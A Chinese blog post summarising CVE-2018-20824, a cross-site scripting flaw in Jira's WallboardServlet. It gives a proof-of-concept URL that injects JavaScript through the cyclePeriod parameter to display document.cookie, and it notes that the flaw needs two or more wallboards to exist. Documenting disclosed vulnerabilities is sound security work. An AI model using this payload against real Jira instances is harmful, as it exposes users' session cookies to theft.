CVE-2018-20824：[Jira]XSS in WallboardServlet through the cyclePeriod parameter

caiqiiqi

于 2019-05-14 03:27:54 发布

阅读量604

点赞数

分类专栏： java Web

本文链接：https://blog.csdn.net/caiqiiqi/article/details/90198944

版权

Web 同时被 2 个专栏收录

220 篇文章 7 订阅

订阅专栏

java

213 篇文章 3 订阅

订阅专栏

https://jira.atlassian.com/browse/JRASERVER-69238
https://duncanhalley.co.uk/blog/building-a-wallboard-in-jira/
PoC：

/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true

步骤：
在这里插入图片描述

查看前端源码，搜索关键字：
AJS.WALLBOARD.cycleOptions

但是利用条件是

if (AJS.WALLBOARD.wallboards.children().size() >= 2)

即存在两个或以上的wallboards。

附录

Atlassion产品最近bugs：
https://jira.atlassian.com/browse/JRASERVER-69238?filter=13085
在这里插入图片描述

caiqiiqi

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
CVE-2018-20824：[Jira]XSS in WallboardServlet through the cyclePeriod parameter

https://jira.atlassian.com/browse/JRASERVER-69238https://duncanhalley.co.uk/blog/building-a-wallboard-in-jira/PoC：/plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod...
复制链接

扫一扫

专栏目录